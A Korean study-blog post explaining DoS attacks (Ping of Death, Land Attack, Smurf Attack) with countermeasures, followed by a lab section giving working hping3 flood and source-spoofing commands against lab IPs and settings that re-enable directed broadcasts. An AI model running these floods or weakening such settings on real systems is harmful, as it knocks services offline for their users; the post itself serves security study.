DoS(1)

justugi·2025년 6월 3일

네트워크 보안

목록 보기
7/13

DoS

  • Denial of Service
    • 서비스 거부 공격
    • 정상적인 정보 시스템에 과도한 네트워크 트래픽을 발생시키거나 시스템 자원을 고갈시켜 정상적인 사용자가 해당 서비스나 시스템을 정상적으로 사용하지 못하도록 방해하는 공격
      • 시스템 신뢰도 하락, 가용성을 침해하는 공격
    • 유형
        1. 과도한 네트워크 트래픽을 발생시켜 정상적인 통신을 못하도록 하여 시스템 접근이 불가능하게 만듦
        • 대역폭 고갈 -> 통신 불가
        1. 정보시스템이나 서버의 자원을 의도적으로 소모시켜 정상적인 사용자가 서비스 이용을 불가능하게 만듦
        • 시스템 자원 (CPU, 메모리, 저장 용량 등) 고갈 -> 서비스 불가
        1. 물리적으로 정보시스템이나 서버 및 네트워크를 공격하여 물리적 시스템 파괴로 인한 서비스 이용을 불가능하게 만듦

Ping of Death

  • 네트워크 트래픽이 아닌 시스템 자원 고갈을 목적으로 하는 공격 -> 오류 & 부하 발생
  • 비정상적으로 용량을 늘린 ping 데이터를 타겟에게 전달하여 타겟 시스템에서 처리하는데에 부하를 발생시킴
    • 단편화하여 비정상적인 조각 데이터로 전송 -> 수신측에서는 재조합 해야함 -> 부하 발생
  • 보안 대책
    • 방화벽 등에서 ICMP 차단
    • 일정 시간 간격에 일정 크기나 개수의 ping 데이터 차단
    • 데이터 조합 시 비정상적으로 크기가 큰 데이터가 있으면 차단

Land Attack

  • 출발지 주소를 목적지 주소와 동일하게 설정하여 전송하여 정상적인 응답을 못하도록 속임
    • 다량의 공격 패킷을 전달하여 부하 발생
  • 시스템 리소스 (CPU, 메모리 등) 를 공격하여 소모시킴
  • 출발지와 목적지의 주소를 정하고 통신하는 프로토콜에 사용 가능
  • 보안 대책
    • 방화벽 등에서 ICMP 차단
    • 출발지 주소와 목적지 주소가 같은 데이터 차단

Smurf Attack

  • 취약한 네트워크의 호스트들을 이용하여 시스템 리소스 (CPU, 메모리 등) 공격
    • 공격자가 취약한 네트워크의 경유지 호스트 장비들에게 출발지 주소를 공격대상 주소로 설정 후 요청을 Direct Broadcast 주소로 전달
      • 공격자의 흔적을 숨기기 쉬움
      • DRDoS (Distribution Reflection DoS) 공격의 모태
  • 보안 대책
    • 라우터에서 Inbound 되는 Direct Broadcast 차단
      • no ip directed-broadcast
        • 일반적으로 설정되어있음
    • Host 에서 icmp direct broadcast 패킷 수신 차단, 응답 비허용

실습

Ping of Death

kali 192.168.50.200
linux 192.168.50.50

[kali]

  • hping3 --icmp --rand-source 공격대상IP -d 데이터크기 --flood
    • 출발지 주소 랜덤 설정, flood : 최고 속도
  • hping3 --icmp --rand-source 192.168.50.50 -d 65000 --flood

Land Attack

kali 192.168.50.200
linux 192.168.50.50

[kali]

  • hping3 -1 -a 타겟IP 타겟IP --flood
  • hping3 -1 -a 192.168.50.50 192.168.50.50 --flood
  • hping3 -a 192.168.50.50 192.168.50.50 -s 22 -k -p 22 -S
    • -S : SYN, -k : 출발지 포트 고정
      • 처음 연결 요청하는게 SYN 이니까 보통 차단 안함

Smurf Attack

kali 10.10.10.1
server 20.20.20.1
client 30.30.30.0/24 대역

[kali]

  • hping3 -a 타겟IP 타겟IP --icmp --flood
  • hping3 -a 20.20.20.1 30.30.30.255 --icmp --flood
    • 이미 기본 라우터 설정에 차단중

[라우터]

  • 브로드캐스트를 보내고 받을 인터페이스에 설정
    ip directed-broadcast

  • 여기까지 진행하면 라우터가 icmp 브로드캐스트 신호를 호스트들에게 전달은 하지만 기본 클라이언트 장비 (PC) 들이 브로드캐스트 신호에 대해 응답을 하진 않음

[client (linux)]

  • 브로드캐스트 신호 설정 확인 및 허용으로 변경
    • sysctl -a | grep icmp_echo
      • net.ipv4.icmp_echo_ignore_broadcasts = 1 로 설정되어 있음
    • sysctl net.ipv4.icmp_echo_ignore_broadcasts=0
profile
justugi
IT 보안, 관심 있는 것을 공부합니다.
이전 포스트

DHCP Attack

다음 포스트

DoS(2)

0개의 댓글